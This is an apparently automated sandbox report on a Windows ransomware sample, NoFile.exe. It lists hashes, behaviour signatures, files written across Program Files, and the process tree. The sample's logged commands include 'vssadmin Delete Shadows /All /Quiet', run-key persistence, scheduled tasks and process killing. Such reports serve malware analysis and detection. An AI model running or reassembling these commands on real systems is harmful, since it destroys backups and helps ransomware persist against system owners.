Analysis
-
max time kernel
150s -
max time network
132s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
06-02-2022 09:18
Static task
static1
Behavioral task
behavioral1
Sample
NoFile.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
NoFile.exe
Resource
win10v2004-en-20220112
General
-
Target
NoFile.exe
-
Size
2.2MB
-
MD5
7d1ed67b77f47ba8aadf9a3ac7d0c371
-
SHA1
a598e6708c189caeef1fa76064feb4d0155abb3d
-
SHA256
87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae
-
SHA512
17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 2 IoCs
Processes:
NoFile.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe NoFile.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe NoFile.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" reg.exe -
Drops desktop.ini file(s) 2 IoCs
Processes:
NoFile.exedescription ioc process File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini NoFile.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
NoFile.exedescription ioc process File opened (read-only) \??\e: NoFile.exe File opened (read-only) \??\h: NoFile.exe File opened (read-only) \??\n: NoFile.exe File opened (read-only) \??\q: NoFile.exe File opened (read-only) \??\s: NoFile.exe File opened (read-only) \??\J: NoFile.exe File opened (read-only) \??\V: NoFile.exe File opened (read-only) \??\X: NoFile.exe File opened (read-only) \??\U: NoFile.exe File opened (read-only) \??\v: NoFile.exe File opened (read-only) \??\E: NoFile.exe File opened (read-only) \??\Z: NoFile.exe File opened (read-only) \??\y: NoFile.exe File opened (read-only) \??\R: NoFile.exe File opened (read-only) \??\T: NoFile.exe File opened (read-only) \??\a: NoFile.exe File opened (read-only) \??\p: NoFile.exe File opened (read-only) \??\t: NoFile.exe File opened (read-only) \??\F: NoFile.exe File opened (read-only) \??\L: NoFile.exe File opened (read-only) \??\O: NoFile.exe File opened (read-only) \??\x: NoFile.exe File opened (read-only) \??\i: NoFile.exe File opened (read-only) \??\r: NoFile.exe File opened (read-only) \??\H: NoFile.exe File opened (read-only) \??\b: NoFile.exe File opened (read-only) \??\f: NoFile.exe File opened (read-only) \??\S: NoFile.exe File opened (read-only) \??\Y: NoFile.exe File opened (read-only) \??\g: NoFile.exe File opened (read-only) \??\j: NoFile.exe File opened (read-only) \??\l: NoFile.exe File opened (read-only) \??\A: NoFile.exe File opened (read-only) \??\K: NoFile.exe File opened (read-only) \??\M: NoFile.exe File opened (read-only) \??\W: NoFile.exe File opened (read-only) \??\k: NoFile.exe File opened (read-only) \??\m: NoFile.exe File opened (read-only) \??\o: NoFile.exe File opened (read-only) \??\B: NoFile.exe File opened (read-only) \??\G: NoFile.exe File opened (read-only) \??\Q: NoFile.exe File opened (read-only) \??\u: NoFile.exe File opened (read-only) \??\w: NoFile.exe File opened (read-only) \??\z: NoFile.exe File opened (read-only) \??\I: NoFile.exe File opened (read-only) \??\N: NoFile.exe File opened (read-only) \??\P: NoFile.exe -
Drops file in Program Files directory 64 IoCs
Processes:
NoFile.exedescription ioc process File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\msadc\msdaremr.dll NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\Portal\PortalConnectCore.dll NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html NoFile.exe File created \??\c:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Microsoft Games\Hearts\de-DE\Hearts.exe.mui NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png NoFile.exe File opened for modification \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Utilities.v3.5.resources.dll NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml NoFile.exe File created \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BOLDSTRI\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\plugins\access\libvcd_plugin.dll NoFile.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml NoFile.exe File opened for modification \??\c:\Program Files\Java\jre7\lib\zi\SystemV\AST4 NoFile.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\PHONE.XML NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\SPRING.ELM NoFile.exe File created \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml NoFile.exe File opened for modification \??\c:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png NoFile.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2native.dll NoFile.exe File created \??\c:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\pkeyconfig.companion.dll NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Word.en-us\SETUP.XML NoFile.exe File created \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\Read_Me!_.txt NoFile.exe File created \??\c:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna NoFile.exe File opened for modification \??\c:\Program Files\Windows Photo Viewer\ImagingDevices.exe NoFile.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif NoFile.exe File opened for modification \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\ReachFramework.resources.dll NoFile.exe File opened for modification \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.AddIn.Contract.dll NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo NoFile.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png NoFile.exe File opened for modification \??\c:\Program Files\Java\jre7\lib\zi\Asia\Makassar NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\plugins\d3d11\libdirect3d11_filters_plugin.dll NoFile.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png NoFile.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png NoFile.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api NoFile.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar NoFile.exe File created \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE14\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png NoFile.exe File created \??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar NoFile.exe File created \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml NoFile.exe -
Drops file in Windows directory 2 IoCs
Processes:
NoFile.exedescription ioc process File created C:\Windows\Pagesfilo.sys NoFile.exe File opened for modification C:\Windows\Pagesfilo.sys NoFile.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 10 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 968 timeout.exe 672 timeout.exe 552 timeout.exe 1708 timeout.exe 688 timeout.exe 1588 timeout.exe 1740 timeout.exe 560 timeout.exe 1780 timeout.exe 1656 timeout.exe -
Enumerates processes with tasklist 1 TTPs 11 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 1928 tasklist.exe 1872 tasklist.exe 796 tasklist.exe 1820 tasklist.exe 1696 tasklist.exe 968 tasklist.exe 1396 tasklist.exe 972 tasklist.exe 632 tasklist.exe 1060 tasklist.exe 364 tasklist.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 964 systeminfo.exe 1160 systeminfo.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 1260 vssadmin.exe 772 vssadmin.exe -
Kills process with taskkill 40 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1520 taskkill.exe 1780 taskkill.exe 1552 taskkill.exe 1984 taskkill.exe 1664 taskkill.exe 1364 taskkill.exe 2020 taskkill.exe 292 taskkill.exe 1548 taskkill.exe 920 taskkill.exe 932 taskkill.exe 268 taskkill.exe 1924 taskkill.exe 688 taskkill.exe 1260 taskkill.exe 1272 taskkill.exe 1044 taskkill.exe 1776 taskkill.exe 1732 taskkill.exe 1272 taskkill.exe 1060 taskkill.exe 624 taskkill.exe 864 taskkill.exe 1612 taskkill.exe 1524 taskkill.exe 316 taskkill.exe 820 taskkill.exe 964 taskkill.exe 1244 taskkill.exe 1728 taskkill.exe 460 taskkill.exe 2028 taskkill.exe 580 taskkill.exe 1696 taskkill.exe 1740 taskkill.exe 364 taskkill.exe 1300 taskkill.exe 1708 taskkill.exe 1396 taskkill.exe 560 taskkill.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
tasklist.exetasklist.exetaskmgr.exepid process 796 tasklist.exe 796 tasklist.exe 632 tasklist.exe 632 tasklist.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 796 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exetasklist.exevssvc.exetaskmgr.exetasklist.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 796 tasklist.exe Token: SeDebugPrivilege 632 tasklist.exe Token: SeBackupPrivilege 2008 vssvc.exe Token: SeRestorePrivilege 2008 vssvc.exe Token: SeAuditPrivilege 2008 vssvc.exe Token: SeDebugPrivilege 796 taskmgr.exe Token: SeDebugPrivilege 1820 tasklist.exe Token: SeIncreaseQuotaPrivilege 460 WMIC.exe Token: SeSecurityPrivilege 460 WMIC.exe Token: SeTakeOwnershipPrivilege 460 WMIC.exe Token: SeLoadDriverPrivilege 460 WMIC.exe Token: SeSystemProfilePrivilege 460 WMIC.exe Token: SeSystemtimePrivilege 460 WMIC.exe Token: SeProfSingleProcessPrivilege 460 WMIC.exe Token: SeIncBasePriorityPrivilege 460 WMIC.exe Token: SeCreatePagefilePrivilege 460 WMIC.exe Token: SeBackupPrivilege 460 WMIC.exe Token: SeRestorePrivilege 460 WMIC.exe Token: SeShutdownPrivilege 460 WMIC.exe Token: SeDebugPrivilege 460 WMIC.exe Token: SeSystemEnvironmentPrivilege 460 WMIC.exe Token: SeRemoteShutdownPrivilege 460 WMIC.exe Token: SeUndockPrivilege 460 WMIC.exe Token: SeManageVolumePrivilege 460 WMIC.exe Token: 33 460 WMIC.exe Token: 34 460 WMIC.exe Token: 35 460 WMIC.exe Token: SeIncreaseQuotaPrivilege 460 WMIC.exe Token: SeSecurityPrivilege 460 WMIC.exe Token: SeTakeOwnershipPrivilege 460 WMIC.exe Token: SeLoadDriverPrivilege 460 WMIC.exe Token: SeSystemProfilePrivilege 460 WMIC.exe Token: SeSystemtimePrivilege 460 WMIC.exe Token: SeProfSingleProcessPrivilege 460 WMIC.exe Token: SeIncBasePriorityPrivilege 460 WMIC.exe Token: SeCreatePagefilePrivilege 460 WMIC.exe Token: SeBackupPrivilege 460 WMIC.exe Token: SeRestorePrivilege 460 WMIC.exe Token: SeShutdownPrivilege 460 WMIC.exe Token: SeDebugPrivilege 460 WMIC.exe Token: SeSystemEnvironmentPrivilege 460 WMIC.exe Token: SeRemoteShutdownPrivilege 460 WMIC.exe Token: SeUndockPrivilege 460 WMIC.exe Token: SeManageVolumePrivilege 460 WMIC.exe Token: 33 460 WMIC.exe Token: 34 460 WMIC.exe Token: 35 460 WMIC.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 820 taskkill.exe Token: SeDebugPrivilege 364 taskkill.exe Token: SeDebugPrivilege 1396 taskkill.exe Token: SeDebugPrivilege 1364 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe Token: SeDebugPrivilege 1552 taskkill.exe Token: SeDebugPrivilege 920 taskkill.exe Token: SeDebugPrivilege 1696 tasklist.exe Token: SeDebugPrivilege 932 taskkill.exe Token: SeDebugPrivilege 1272 taskkill.exe Token: SeDebugPrivilege 560 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
NoFile.execmd.execmd.execmd.exeWScript.execmd.execmd.exedescription pid process target process PID 1604 wrote to memory of 808 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 808 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 808 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 808 1604 NoFile.exe cmd.exe PID 808 wrote to memory of 796 808 cmd.exe tasklist.exe PID 808 wrote to memory of 796 808 cmd.exe tasklist.exe PID 808 wrote to memory of 796 808 cmd.exe tasklist.exe PID 808 wrote to memory of 796 808 cmd.exe tasklist.exe PID 808 wrote to memory of 1032 808 cmd.exe findstr.exe PID 808 wrote to memory of 1032 808 cmd.exe findstr.exe PID 808 wrote to memory of 1032 808 cmd.exe findstr.exe PID 808 wrote to memory of 1032 808 cmd.exe findstr.exe PID 1604 wrote to memory of 1796 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1796 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1796 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1796 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1820 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1820 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1820 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1820 1604 NoFile.exe cmd.exe PID 1820 wrote to memory of 580 1820 cmd.exe WScript.exe PID 1820 wrote to memory of 580 1820 cmd.exe WScript.exe PID 1820 wrote to memory of 580 1820 cmd.exe WScript.exe PID 1820 wrote to memory of 580 1820 cmd.exe WScript.exe PID 1604 wrote to memory of 268 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 268 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 268 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 268 1604 NoFile.exe cmd.exe PID 268 wrote to memory of 560 268 cmd.exe schtasks.exe PID 268 wrote to memory of 560 268 cmd.exe schtasks.exe PID 268 wrote to memory of 560 268 cmd.exe schtasks.exe PID 268 wrote to memory of 560 268 cmd.exe schtasks.exe PID 580 wrote to memory of 1624 580 WScript.exe cmd.exe PID 580 wrote to memory of 1624 580 WScript.exe cmd.exe PID 580 wrote to memory of 1624 580 WScript.exe cmd.exe PID 580 wrote to memory of 1624 580 WScript.exe cmd.exe PID 580 wrote to memory of 832 580 WScript.exe cmd.exe PID 580 wrote to memory of 832 580 WScript.exe cmd.exe PID 580 wrote to memory of 832 580 WScript.exe cmd.exe PID 580 wrote to memory of 832 580 WScript.exe cmd.exe PID 832 wrote to memory of 632 832 cmd.exe tasklist.exe PID 832 wrote to memory of 632 832 cmd.exe tasklist.exe PID 832 wrote to memory of 632 832 cmd.exe tasklist.exe PID 832 wrote to memory of 632 832 cmd.exe tasklist.exe PID 832 wrote to memory of 1176 832 cmd.exe find.exe PID 832 wrote to memory of 1176 832 cmd.exe find.exe PID 832 wrote to memory of 1176 832 cmd.exe find.exe PID 832 wrote to memory of 1176 832 cmd.exe find.exe PID 1604 wrote to memory of 1876 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1876 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1876 1604 NoFile.exe cmd.exe PID 1604 wrote to memory of 1876 1604 NoFile.exe cmd.exe PID 1876 wrote to memory of 1512 1876 cmd.exe nslookup.exe PID 1876 wrote to memory of 1512 1876 cmd.exe nslookup.exe PID 1876 wrote to memory of 1512 1876 cmd.exe nslookup.exe PID 1876 wrote to memory of 1512 1876 cmd.exe nslookup.exe PID 832 wrote to memory of 1260 832 cmd.exe vssadmin.exe PID 832 wrote to memory of 1260 832 cmd.exe vssadmin.exe PID 832 wrote to memory of 1260 832 cmd.exe vssadmin.exe PID 832 wrote to memory of 1260 832 cmd.exe vssadmin.exe PID 832 wrote to memory of 672 832 cmd.exe timeout.exe PID 832 wrote to memory of 672 832 cmd.exe timeout.exe PID 832 wrote to memory of 672 832 cmd.exe timeout.exe PID 832 wrote to memory of 672 832 cmd.exe timeout.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NoFile.exe"C:\Users\Admin\AppData\Local\Temp\NoFile.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
